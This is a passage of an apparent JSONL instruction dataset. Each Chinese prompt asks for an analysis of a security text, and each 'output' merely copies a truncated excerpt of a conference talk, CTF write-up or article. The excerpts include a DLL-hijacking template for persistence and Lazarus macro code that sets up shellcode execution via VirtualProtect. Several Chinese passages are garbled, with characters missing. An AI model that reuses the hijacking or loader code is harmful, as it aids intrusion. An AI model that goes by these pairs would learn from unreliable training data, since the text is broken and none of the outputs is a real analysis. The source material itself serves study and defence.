makeClass(String clazzName) throws Exception{ ClassPool classPool = ClassPool.getDefault(); CtClass ctClass = classPool.makeClass(clazzName); Class clazz = ctClass.toClass(); ctClass.defrost(); return clazz; } public Class toClass(CtClass ct, ClassLoader loader, ProtectionDomain domain) throws CannotCompileException { try { byte[] b = ct.toBytecode(); Method method; Object[] args; if (domain == null) { method = defineClass1; args = new Object[]{ct.getName(), b, new Integer(0), new Integer(b.length)}; } else { method = defineClass2; args = new Object[]{ct.getName(), b, new Integer(0), new Integer(b.length), domain}; } return (Class)toClass2(method, loader, args); } catch (RuntimeException var7) { throw var7; } catch (InvocationTargetException var8) { throw new CannotCompileException(var8.getTargetException()); 这个变量在类的静态块做了初始化 } catch (Exception var9) { throw new CannotCompileException(var9); } } //反射调法 private static synchronized Object toClass2(Method method, ClassLoader loader, Object[] args) throws Exception { method.setAccessible(true); Object var3; try { var3 = method.invoke(loader, args); } finally { method.setAccessible(false); } return var3; } static { try { AccessController.doPrivileged(new PrivilegedExceptionAction() { public Object run() throws ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n动化通DLL劫持 - 1 动化通DLL劫持 之前写过篇 使加的式成\"冲锋\"使到部分 dll 劫持的技术但是它的场景是劫持后阻断正常件的运程序的控制权交到 件中 这篇章是对通 DLL 劫持的研究期望能制作个通的 DLL劫持程序原有的 dll 但保留原 dll 的功能同时执的代码这个 dll 最好能动成(不要动编译)主要于维权场景 已有研究 Aheadlib 著名的具 Aheadlib 能直接成转发形式的 dll 劫持源码,通过 #pragma comment(linker,\"/EXPORT:\") 来指定导出表的转发 转发模式成的源码 红队开发 - 加动化成器.md - 草窝博客 参考些APT组织的攻击法它们在投递阶段有时候会使加的式通常它们会使个带有签名的件+个定义dll件所以 研究了下这种加的实现式以及如何将... x.hacking8.com 动化通DLL劫持 - 2 C++ 及时调模式成的源码 每个导出函数会跳转到个全局保存的地址中在 dll 初始化的时候会通过解析原 dll 对这些地址依次赋值 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 头文件 #include <Windows.h> ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 导出函数 #pragma comment(linker, \"/EXPORT:Box=testOrg.Box,@1\") ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 入口函数 BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved) { if (dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); } else if (dwReason == DLL_PROCESS_DETACH) { } return TRUE; } ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 动化通DLL劫持 - 3 C++ 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////// // 头文件 #include <Windows.h> //////////////////////////////////////////////////////////////////////////////////////", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Challenge 2 Worked with AvivC, YaakovC. ## Description After finishing [Challenge 1](Challenge1.md) and extracting the encrypted PCAP file, we can start Challenge 2. At some point the creators uploaded a new version of `decrypt.rar.rar` with the following `README` file: > After opening challenge2.pcap.rar, please send to our mail the md5 of the pcap as a flag. > > The pcap contains evidence of an attack in a private network we were hired to research. > > You should find the outer IP address of the attacker by investigating malicious activity. > > This challeng will require you to think out of the box, good luck. ## Solution Let's take a look at the PCAP file: ```console root@kali:/media/sf_CTFs/hoshen/2# tshark -qz io,phs -r Challenge2.pcapng Running as user \"root\" and group \"root\". This could be dangerous. =================================================================== Protocol Hierarchy Statistics Filter: eth frames:212107 bytes:148758200 arp frames:3542 bytes:209514 ip frames:205803 bytes:148291639 tcp frames:180934 bytes:145976750 ssl frames:46939 bytes:41069107 tcp.segments frames:18609 bytes:24518037 ssl frames:10615 bytes:15126013 data frames:114 bytes:7019 nbss frames:26001 bytes:9905038 smb2 frames:25992 bytes:9903504 smb2 frames:4088 bytes:2106738 tcp.segments frames:554 bytes:332248 smb2 frames:98 bytes:64221 tcp.segments frames:38 bytes:30236 nbss frames:7 bytes:2306 smb2 frames:7 bytes:2306 nbss frames:1 bytes:473 smb2 frames:1 bytes:473 nbss frames:1 bytes:473 smb2 frames:1 bytes:473 tcp.segments frames:24 bytes:26784 dcerpc frames:4 bytes:1200 srvsvc frames:2 bytes:616 dcerpc frames:1 bytes:350 srvsvc frames:1 bytes:350 data frames:6379 bytes:4465331 tcp.segments frames:2851 bytes:1329327 smb frames:7 bytes:1419 udp frames:7766 bytes:1049528 bootp frames:862 bytes:397908 llmnr frames:3092 bytes:204261 nbns frames:2720 bytes:250570 ssdp frames:618 bytes:122750 data frames:46 bytes:3772 dns frames:254 bytes:28592 nbdgm frames:168 bytes:40843 smb f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCompression Oracle Attacks on VPN Networks Nafeez Defcon 26 About Nafeez - @sketpic_fx Interested in AppSec and writing software Maker @ assetwatch.io, Attacker Surface Discovery as a Service Overview Compression Side Channel and Encryption History of attacks VPNs and how they use compression Demo - Voracle Tool How to find if your \"VPN\" is vulnerable Way forward Data Compression LZ77 Replace redundant patterns 102 Characters Everything looked dark and bleak, everything looked gloomy, and everything was under a blanket of mist 89 Characters Everything looked dark and bleak, (-34,18)gloomy, and (-54,11)was under a blanket of mist Data Compression Huffman Coding Replace frequent bytes with shorter codes https://en.wikipedia.org/wiki/Huffman_coding Data Compression DEFLATE - LZ77 + Huffman Coding ZLIB, GZIP are well known DEFLATE libraries Compression Side Channel First known research in 2002 The Side Channel Length of encrypted payloads Compression Oracle Chosen Plain Text Attack Brute force the secret byte by byte Force a compression between the chosen byte and the existing bytes in the secret Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=1 Cookie: secret=637193 -some-data- (-34,15)1 Encrypted Payload Length = 43 Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=2 Cookie: secret=637193 -some-data- (-34,15)2 Encrypted Payload Length = 43 Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=3 Cookie: secret=637193 -some-data- (-34,15)3 Encrypted Payload Length = 43 Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=4 Cookie: secret=637193 -some-data- (-34,15)4 Encrypted Payload Length = 43 Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=5 Cookie: secret=637193 -some-data- (-34,15)5 Encrypted Payload Length = 43 Compression Oracle Cookie: secret=637193 -some-data- Cookie: secret=6 Cookie: secret=637193 -some-data- (-34,16) Encrypted Payload Length = 42 How can we convert this into an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPwning \"the toughest target\": the exploit chain of winning the largest bug bounty in the history of ASR program Jianjun Dai Guang Gong Wenlin Yang #whoami  Guang Gong  Senior Security Researcher and Team Leader of 360 Alpha Team  Android/Chrome CVE hunter  Speaker at Black Hat, CanSecWest, PHDays, SyScan360, MOSEC, PacSec, etc  Mobile Pwn2Own 2015, Pwn0Rama 2016, Pwn2Own 2016, PwnFest 2016, Mobile Pwn2Own 2017 winner  1st submit the working remote exploit chain of ASR  Wenlin Yang  Security Researcher at 360 Alpha Team  Android system CVE hunter  Jianjun Dai  Security Researcher at 360 Alpha Team  Android system CVE hunter  Speaker at CanSecWest How we pwned Pixel running Android Nougat Two bugs forms the complete exploit chain  a V8 bug to compromise the renderer  a system_server bug to escape sandbox and get system user permissions Agenda  Exploition of V8 engine  Exploitation of System_server  Conclusion Exploition of V8 engine  Introduction SharedArrayBuffer and WebAssembly  Analyze the Chain of Bugs #1 - CVE-2017-5116  Exploitation of CVE-2017-5116 SharedArrayBuffer  V8 6.0 introduced  Low-level mechanism to share memory between JavaScript workers  Unlock the ability to port threaded applications to the web via asm.js or WebAssembly // create a SharedArrayBuffer with a size in bytes const buffer = new SharedArrayBuffer(8); SharedArrayBuffer was disabled by default in all major browsers on January 2018, in response to Meltdown and Spectre WebAssembly  New type of code that can be run in modern web browsers  Low-level assembly-like language with a compact binary format that runs with near-native performance  Provide languages such as C/C++ with a compilation target  Run alongside JavaScript WebAssembly var importObject = { imports: { imported_func: arg => console.log(arg) } }; WebAssembly.instantiateStreaming(fetch('simple.wasm'), importObject) .then(obj => obj.instance.exports.exported_func()); Analyze the Chain of Bugs #1 CVE-2017-5116 vulnerable Chrome: prior ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicrosoft Portable Executable and Common Object File Format Specification Microsoft Corporation Revision 6.0 - February 1999 Microsoft Portable Executable and Common Object File Format Specification IMPORTANTREAD CAREFULLY: This Microsoft Agreement (Agreement) is a legal agreement between you (either an individual or a single entity) and Microsoft Corporation (Microsoft) for the version of the Microsoft specification identified above which you are about to download (Specification). BY DOWNLOADING, COPYING OR OTHERWISE USING THE SPECIFICATION, YOU AGREE TO BE BOUND BY THE TERMS OF THIS AGREEMENT. IF YOU DO NOT AGREE TO THE TERMS OF THIS AGREEMENT, DO NOT DOWNLOAD, COPY, OR USE THE SPECIFICATION. The Specification is owned by Microsoft or its suppliers and is protected by copyright laws and international copyright treaties, as well as other intellectual property laws and treaties. 1. LIMITED COVENANT NOT TO SUE. (a) Provided that you comply with all terms and conditions of this Agreement and subject to the limitations in Sections 1(b)  (e) below, Microsoft grants to you the following non-exclusive, worldwide, royalty-free, non-transferable, non- sublicenseable, reciprocal limited covenant not to sue: (i) under any copyrights owned or licensable by Microsoft without payment of consideration to unaffiliated third parties, to reproduce the Specification solely for the purposes of creating (x) Image Files and (y) Tools; and (ii) under its Necessary Claims solely to make, have made, use, import, and directly and indirectly, offer to sell, sell and otherwise distribute and dispose of Image Files or Tools. For purposes of the foregoing, the Specification is unmodified if there are no changes, additions or extensions to the Specification, Image Files means (a) executable files which comply with the Specification in unmodified form (Executable Files) and (b) object files which comply with the Specification in unmodified form (Object Files),  Tools means (a) linkers which gener", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaelstrom: Are you playing with a full deck? Using an Attack Lifecycle Game to Educate, Demonstrate and Evangelize ! #cybermaelstrom Shane Steiger, Esq. CISSP Shane Steiger  2016 DEF CON 24 $ whoami ~ messing with computers since 1989 - TIN, PINE, yTalk, Lynx, MUDs, etc.  ~ 8 years in a large food manufacturer helping to build and secure SCADA/ICS systems across 90+ food manufacturing plants in the US.  ~ 6 years building out a security function in one of the largest pharmaceutical drug distributors in the US.  ~ currently Chief Endpoint Security Architect in a large tech company building out the roadmaps for desirable Cyber Resiliency techniques in the endpoint space.  ~ much better than family law! I am more of a geek.  $ disclaimer ~ the views and opinions are purely my own based on time in the industry and experience. They dont necessarily reflect the views, positions or policies of my employer.  ~ oh yeah....this presentation and discussion is not intended to give legal advice nor form any kind of attorney/client relationship. I am not your attorney and some of the things you might find interesting may require consultation with your own attorney (not me J).  ! $ agenda ~ unexpected journey to a cyber attack lifecycle game ~ research that took me on that journey ~ maelstrom the game $ strategy journey ~ from a past life, I was asked by a CIO do they win?  ~ later, asked to look at a solution for over 300k endpoints  ~ like most folks  look at requirements, functionality, capabilities and operationalization  ~ hmmmm....wow I got a pretty heat map that doesnt seem very useful in terms of selecting things at large scale  ~ do they win stuck with me; find a way to develop better strategic choices $ Lockheed Martin Cyber Kill Chain  Reconnaissance!  Research,!ID/ selec2on!of!targets!  Email!addresses!  Social! rela2onships!  Target!technology! &!topology! Weaponiza2on!  Combining!an! exploit!with!a! payload!to! establish/maintain! access!by!aDacker!! Delivery!  Trans", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOur Instrumented Life http://www.nydailynews.com/entertainment/tv/2010/06/07/2010-06-07_a_paparazzo_sits_for_his_portrait.html Greg Conti // West Point // gregory.conti@usma.edu The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense or the U.S. Government. ... ا غا ه نا اه يز بأ ا ءارا ا ی  يأ ا ةرازو  ﺏ ا ﺏا ا وأ ةا تی ا ع 或 تیا ﻡ عا و ةا. ... The view points of views expressed by the author of this statement costumes, and do not reflect the official policy of the University of Bo and the United States Army, Pentagon U.S. government sector employment. Where are the sensors in your life? http://www.police.nashville.gov/news/media/2009/09/SuspectATM2.jpg Sometimes They Find You http://en.wikipedia.org/wiki/File:Cisco7960G.jpeg http://img.thesun.co.uk/multimedia/archive/00763/googlemain_763166a.jpg http://rst.gsfc.nasa.gov/Intro/Part2_26e.html http://2010.census.gov/mediacenter/img/DSC_0500.JPG Census Taker Satellite Robocaller Streetview http://www.drpepper.com/promotions/ea/ Sometimes You Go To Them http://en.wikipedia.org/wiki/File:Panopticon.jpg Predictive Models The long-term danger is extraction of self. That others know more about you than you know about yourself. At such a point, we dont lose just individuality, we lose the individual - Marc Rotenberg Executive Director EPIC Garfinkel, Simson. Database Nation, p. 252 http://www.nytimes.com/2005/06/26/weekinreview/26fount.html?ei=5090&en=72e68bdc3771199d&ex=1277438400&adxnnl=1&partner=rssuserland&emc=rss&adxnnlx=1277384672-tCFhZIeWqKM6UymOmrcuTg Our Instrumented Lives  The Problem  Your Person  Online  Your Home  Your Community  Countermeasures  At Look to the Future Model Sensor -Capabilities -Analog vs. Digital -Power source -Mobility -Strengths & Weaknesses Model Environment -Subject -Warning -Knowledge -Privacy Policy -Opt-In & (Realistic)Opt-Out -Complici", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSarah Edwards | @iamevltwin | oompa@csh.rit.edu | mac4n6.com iCloud Basics Storage and Acquisition of iCloud Data Synced Preferences Application Data What is Everything?  Documents  Email  Contacts  Preference Configurations  Photos  Calendar  Notes  Reminders  and more! ! Email: Apple ID ! Numeric: iCloud Person ID ! Vetted Account Aliases ! Email Addresses ! Phone Numbers ! Credentials ! Password ! Two-factor ! Token ! Storage ! 5GB Data Free ! Can purchase up to 1TB OS X  ~/Library/Application Support/iCloud/Accounts iOS  /private/var/mobile/Library/Preferences/com.apple.ubd.plist Windows  HKEY_CURRENT_USER\\Software\\Apple Inc.\\Internet Services On Disk  OS X - Disk Image  Windows - Disk Image  iOS  Physical Acquisition - Jailbreak required for iPhone4S generations and newer.  or SSH  or Physical Logical (Elcomsoft EIFT, save user files to .tar archive) iCloud.com  Various Download Tools Downloadable Storage Types  iCloud Backups (iTunes-ish Backups)  iCloud Data (Mobile Documents, Photos, Synced Preferences, etc) Sketchy  iPhone Backup Extractor - http://www.iphonebackupextractor.com/  iPhone Data Recovery - http://www.iskysoft.com/data-recovery/how-to- download-icloud-backup.html Slightly Less Sketchy?  iLoot - https://github.com/hackappcom/iloot Forensic  Elcomsoft Phone Breaker (EPPB) - https://www.elcomsoft.com/ eppb.html  iLoot:  Apple ID Required  No Two-factor Support  Python! Run Anywhere  Command-line Only  Open Source  Free!  Elcomsoft Phone Breaker (EPPB) ! Forensic ! Apple ID or Authentication Token ! Support for Two-factor ! Mac or Windows ! Professional or Forensic Editions  iCloud Backups & iCloud Files (iCloud Drive)  $200, $800  Contains synced preferences for:  Email  Safari  WiFi  Maps  Stocks  Weather  Messages  Legacy & Sandboxed Locations  ~/Library/SyncedPreferences/  ~/Library/Containers/  OSX:  ~/Library/SyncedPreferences/com.apple.mail-com.apple.mail.recents.plist  ~/Library/Containers/com.apple.corerecents.recentsd/Data/Library/SyncedPr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n一个很有意思的shellcode执行方式 前言 好久没更文了,最近事情比较多.在日常看样本的时候看到了一个Lazarus所使用的新型Macro植入物.其还 是该组织第一次使用的相关技术感觉比较少见而且很有意思虽然技术不是一个很先进的技术但是在宏 的利用中却有一定的可能.还是可以多多学习用于RedTeam的工作中的 Macro宏分析 前面的导出声明部分: Private Declare PtrSafe Function WMCreateBackupRestorer Lib \"Crypt32\" _ Alias \"CryptStringToBinaryW\" (ByVal WmBckupParam1 As LongPtr, ByVal WmBckupParam2 As Long, ByVal WmBckupParam3 As LongPtr, ByVal WmBckupParam4 As LongPtr, ByVal WmBckupParam5 As LongPtr, ByVal WmBckupParam6 As LongPtr, ByVal WmBckupParam7 As LongPtr) As Long Private Const Play_Encd = &H4 Private Const Play_Decd_Rdh = &H20 Private Const Play_Encd_Dcd = &H40 Private Const WM_CERTSYNCREAD = &H1 #If Win64 Then Private Declare PtrSafe Function LoadPlaybackHD Lib \"kernel32\" _ Alias \"LoadLibraryA\" (ByVal LoadPlaybackHDSize As String) As LongLong #Else Private Declare PtrSafe Function LoadPlaybackHD Lib \"kernel32\" _ Alias \"LoadLibraryA\" (ByVal LoadPlaybackHDSize As String) As Long #End If #If Win64 Then Private Declare PtrSafe Function WMvdspt Lib \"kernel32\" _ Alias \"GetProcAddress\" (ByVal WMvdsptParam1 As LongLong, ByVal WMvdsptParam2 As String) As LongPtr #Else Private Declare PtrSafe Function WMvdspt Lib \"kernel32\" _ Alias \"GetProcAddress\" (ByVal WMvdsptParam1 As Long, ByVal WMvdsptParam2 As String) As LongPtr #End If #If Win64 Then Private Declare PtrSafe Function WMVSDecd Lib \"kernel32\" _ Alias \"VirtualProtect\" (WMVSDecdParam1 As LongPtr, ByVal WMVSDecdParam2 As LongLong, ByVal WMVSDecdParam3 As Long, WMVSDecdParam4 As LongPtr) As Long Private Declare PtrSafe Sub WMVdspa Lib \"ntdll\" Alias \"memcpy\" (ByRef WMVdspaParam1 As Any, ByRef WMVdspaParam2 As Any, ByVal WMVdspaParam3 As LongLong) 整理一下别名 执行的入口部分 通过 Frame1_Layout 执行宏的操作 #Else Private Declare PtrSafe Function WMVSDecd Lib \"kernel32\" _ Alias \"VirtualProtect\" (WMVSDecdParam1 As LongPtr, ByVal WMVSDecdParam2 As Long, ByVal WMVSDecdParam3 As Long, WMVSDecdParam4 As LongPtr) As Long Private Declare PtrSafe Sub WMVdspa Lib \"ntdll\" Alias \"memcpy\" (ByRef WMVdspaParam1 As Any, By", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n宝宝树安全总监王利 宝宝树 中国规模最大孕婴社区公司员工约1000人 每天产生文字图片音视频百万级 用户覆盖全国大部分年轻一代准妈妈和孕婴妈妈 分享人王利 多年甲乙双方打杂经验 曾任职于宝宝树爱奇艺等互联网公司 兴趣爱好产品经理白帽子羊毛党 公司介绍 Topics  0x01 安全体系 社区+电商  0x02 风控边控联动 反爬虫+反扫描+防火墙自动化  0x03 风控系统 引擎+指纹+数据  0x04 开源应用 扫描平台+ HIDS  0x05 数据安全 加密+脱敏+DLP 宝宝树社区&电商常见攻击 中等规模社区电商互联网安全体系绿色优先完成 半 年 零 预 算 异 地 多 IDC 全 私 有 云 日志平台与防火墙联动自动化拦截 2017.12.8 扫描引发 的事件  在大型众测平台上 线SRC前需做好 防扫描爬虫自 动化渗透工具 前提条件 l 日志平台ELKSplunk l WAF(防火墙)有API支持向API写 拦截规则国产WAF较多没有API 业务价值 l 反扫描反爬虫绊IP l 防火墙自动化运维参考宜信 l ACL管控服务参考爱奇艺 日志平台与防火墙联动自动化拦截 Nginx访问日志 WAF防火墙日志 1.收集日志 2.配置拦截规则 3.向API写拦截策略 WAF/防火墙 4.1 拦截IP 4.2 拦截用户session 4.3 拦截UA token等特征值 宝宝树多个APP 5.给APP返回拦截 时的http code 6.APP根据code定制 回显减少误伤投诉 日志分析平台 踩过的坑日志平台与防火墙联动 1. 拦截高频爬虫导致某个IDC多花几万元网费 waf拦截触发返回 403页面默认是一张30K的 图片当高频爬虫每分钟10万次请求时 IDC出口流量暴增网费增加优化WAF返 回403页面的大小只写文字不用图片 2. 拦截IP误伤用户投诉每月XX人因用户宽 带NAT导致需精准拦截session或设备 3. WAF硬盘日志打满查询打不开需及时收 到日志平台Nginx日志量太大只存几天 4. 拦截IP只是解决爬虫的辅助方法爬虫和撞 库来自全国各地IP代理池需主要接口接入 风控拦截设备指纹和JS浏览器指纹 5. 不能防撞库每个IP登录3次后换IP防撞库 需增加APP设备指纹和H5 js指纹验证 日志平台+Redis+API 准实时简易风控 Nginx访问日志 业务功能接口 打印结果日志 1.收集日志 2.配置风控规则 3.分析结果入库 宝 宝 树 业 务 服 务 端 日志分析平台 4.实时同步数据 到缓存 6.查询风控库 5.http请求风 控API用uid 查询用户风险 并返回结果 8.离线用户画像 业务价值 l 人机账号识别抓机器注 册登录刷接口单设备 登录多账号 l 社区抽奖/产品试用反黄牛 7.异步写入 举个栗子机器注册识别规则 (APP和H5未上线设备指纹时使用 机器注册特征 软件注册机IP一次请求注册接口并注册成功 打码平台IP请求图片验证码短信验证码猫池提 供手机号可批量重置猫池手机号密码 Saas风控 VS 本地风控引擎  Saas风控黑数据查询API+简单风控规则  本地风控复杂风控规则+自产黑数据+外采黑数据  多家手机号黑卡测试效果黄牛黑名单命中率50%非黑用户误伤率30%-50%  Why只有50%? 在互联网金融骗贷不一定在社区发广告也不一定在电商撸羊毛 本地风控推荐关注爱奇艺技术产品团队唯品会微信公众号 风控系统引擎+规则+数据+设备指纹 风控对外接入http API(有代码侵入)日志消息队列(无代码侵入) 风控处理中心实时近实时离线计算 风控管理平台规则模型 风控处罚中心API接口边控设备 APP和H5js设备指纹人机识别标识设备模拟器/root/越狱检测 某大厂风控引擎接入处理规则处罚 踩过的坑 1.开源浏览器指纹Fingerprint2不适用APP和手机H5页面指纹同型号 操作系统版本浏览器相同则指纹相同 2.APP未集成设备指纹SDK前 服务端收集MACIMEIuuidIDFA分辨率等等+盐 计算APP设备指纹 网页可采用Fingerprint2开源浏览器指纹 3.不要过度依赖图片验证码一些可被打码平台秒过不过不扣费 设备指纹人机识别设备标识模拟器/root/按键精灵/改机工具 1.APP集成设备指纹SDK H5网页集成js设备指纹 2.发送采集数据 4.返回Token 工号同步 (标准LDAP) 3.计算设备指纹和Token APP和H5网页 风控服务集群 风控计算传递字段 / 指标计算 / 匹配规则 / 返回结果 用好基本风控规则+设备指纹解决70%以上的问题 1. 用户字段uid手机号注册收货收货地址身份证号等 2. 设备字段APP设备指纹H5 jS指纹模拟器root/越狱等 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSniffing Keystrokes With Lasers/Voltmeters Sniffing Keystrokes With Lasers/Voltmeters Side Channel Attacks Using Optical Sampling Of Mechanical Energy And Power Line Leakage Copyright 2009 Inverse Path Ltd. Andrea Barisani Chief Security Engineer <andrea@inversepath.com> http://www.inversepath.com Daniele Bianco Hardware Hacker <daniele@inversepath.com> Introduction DISCLAIMER: All the equipment and/or circuits and/or schematics provided in the presentation must be treated as examples, use the presented information at your own risk! Safety first! Copyright 2009 Inverse Path Ltd. Andrea Barisani <andrea@inversepath.com> Daniele Bianco <daniele@inversepath.com> This work is released under the terms of the Creative Commons Attribution-NonCommercial-NoDerivs License available at http://creativecommons.org/licenses/by-nc-nd/3.0. Sniffing Keystrokes With Lasers/Voltmeters Copyright 2009 Inverse Path Ltd. Two Unconventional Attacks  Attack 1: Power Line Leakage detection against wired PS/2 keyboards  Attack 2: Optical Sampling of Mechanical Energy against laptop keyboards Sniffing Keystrokes With Lasers/Voltmeters Copyright 2009 Inverse Path Ltd. Why bother ?  Getting bored by software...hardware hacking is good fun!  Unconventional side channel attacks  Relatively cheap hardware  FRIGGING LASER BEAMS!  As always....more important: girls will melt when you show this...  This is still a work in progress, we are planning to considerably refine the data/equipment presented in the next months Sniffing Keystrokes With Lasers/Voltmeters Copyright 2009 Inverse Path Ltd. TEMPEST  What is TEMPEST ? Transmitted Electro-Magnetic Pulse / Energy Standards & Testing Tiny ElectroMagnetic Particles Emitting Secret Things The Emissions Might Produce Extremely Sweet Talks  Investigations and studies of Compromising Emanations or Fortuitous Leakage  Unintentional intelligence-bearing signals which, if intercepted and analyzed, may disclose information  The term was coined in the late 60's an", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlack Badge Uber Alles ???? Agenda 1. Who are we 2. Why do this 3. Dc 22 4. Dc 14 5. Dc 23 6. Thank you 7. QA 8. Fin Who are these hackers on stage DC503 members Jesse - human computer Kenny - human pick and place machine Mike - Senior Trouble Maker Mickey - least israeli israeli person mike knows Joe - Intel (reformed) Dean - bricker of all things Motivation For the lulz Standing in line sucks 1o57 said it was not possible Because we can DC22 DC22 - Background - Open source human badge schematics released after defcon. - Playing around with them - Hey, can we make a black badge? - We , kind of, know how to EAGLE. Not to dip trace - And we love 1o57, we wanted to surprise him. DC22 - How - Found human badge schematics online and used as reference - DipTrace and EAGLE - the battle. - Reversing the silk screen hours of photo manipulation and google searching! - Reversing the board and the BOM (what part goes where) - The story of Fabrication and dickbutt. - How it ended up - We won the Badge hacking contest! - Compared to a real DC22 BB side by side and operating. Release Gerbs DC22 - Result - How it ended up - We won the Badge hacking contest! - Compared to a real DC22 BB side by side and operating. DC14 DC14 - We love you Joe Grand! (no, really, he is the sweetest) - Why this one? - background story - Seemed to be the easiest, but let me tell you... - How we did it - Built from scratch, using EAGLE. - Funny story about free EAGLE and 80cm. - Funnier story about Board fabrication. - Overnight fabrication and late night DC hotel soldering - How it ended up - Compared to the real deal <sausage making process> <DC14 board view in eagle> WINNAR DC23 DC23 DC23 (Mickey, Mike, Dean) - Background - Why? Because Lost said it couldn't be done. DC23 DC23 (Mickey, Mike, Dean) - Background - Why? Because Lost said it couldn't be done. - How we did it - social engineer the only guy in the world who makes captured lightning thingies - No, seriously, The type used by Lost is no long", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPlease insert inject more coins Defcon XXI Press start x 2 Me ?  Nicolas Oberli (aka Balda)  Swiss security engineer  CTF enthusiast  Retro gamer  Beer drinker / brewer x 3 It all started so simply...  I wanted to add coin handling to my MAMEcab  Bought a coin acceptor on an auction site x 4 Coin handling devices  All kind of machines use coin handling devices  ATMs  Vending machines  Casino game machines    Multiple devices are used in those machines x 5 Coin / Bill acceptors  Used to count coins and bills  Can detect coin/bill value  Detects false coins/bills x 6 Coin hopper  Used to give coins back to the customer  One hopper per coin value  Gives back coins one by one x 7 Communication protocols  Multiple protocols are used to communicate with these devices  Parallel  Serial (RS232)  MDB  ccTalk  The protocols are very vendor-specific  ccTalk is what we will be talking about x 8 ccTalk ?  coin-controls-Talk  Semi-proprietary protocol  Maintained by Money Controls LLC, England  Protocol specs available on cctalk.org  Some parts of the specs are only available after signing a NDA :-( x 9 ccTalk ?  Request / response messages  RS232-like data transmission  Uses only one wire for both sending and receiving  9600 bits/s, 8N1, TTL signals (0 - 5V)  Each device has its own address on the bus  By default 1=controller, 2=coin acceptor x 10 ccTalk message format  All frames use the same format  Header is the actual command sent to the device  Header == 0 means it's a response  Payload length can vary from 0 to 252  Data length != packet length  Checksum is the complement to 0xFF of the packet destination data length source header [data] checksum 1 byte x 11 ccTalk headers  Each command is assigned a header  Since its coded in a byte, 256 possible commands  From the doc : x 12 Sample communication  02 00 01 FE ff  Sample poll from @01 to @02  01 00 02 00 FD  Response from @02 to @01  02 00 01 F6 07  Request manufacturer ID  01 03 02 00 4E 52 49 11  Response (length 3) : NR", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Wee R Leet Misc. ## Description: > Somebody forgot a useless assert function in the interpreter somewhere. In our agile development lifecycle somebody added the function early on to prove it's possible. Wev've only heared stories but apparently you can trigger it from Wee and it behaves differently for some \"leet\" input(?) What a joker. We will address this issue over the next few sprints. Hopefully it doesn't do any harm in the meantime. ## Solution: This is a \"Wee\" challenge - see basic explanation [here](./Wee/). The `assert_leet` logic is as follows: ```typescript externals.addFunction( \"assert_leet\", [{name: \"maybe_leet\", type: compiler.NumberType}], compiler.StringType, false, (maybe_leet: number) => maybe_leet !== 0x1337 ? \"WEE AIN'T LEET\" : flags.WEE_R_LEET ) ``` The solution is pretty simple, call `assert_leet` with 0x1337: ```python import requests r = requests.post('http://35.207.189.79/wee/run', json={\"code\": \"alert(assert_leet(4919))\"}) print(r.text) ``` The flag: 35C3_HELLO_WEE_LI77LE_WORLD", "category": "text_analysis", "source": "security_papers"}
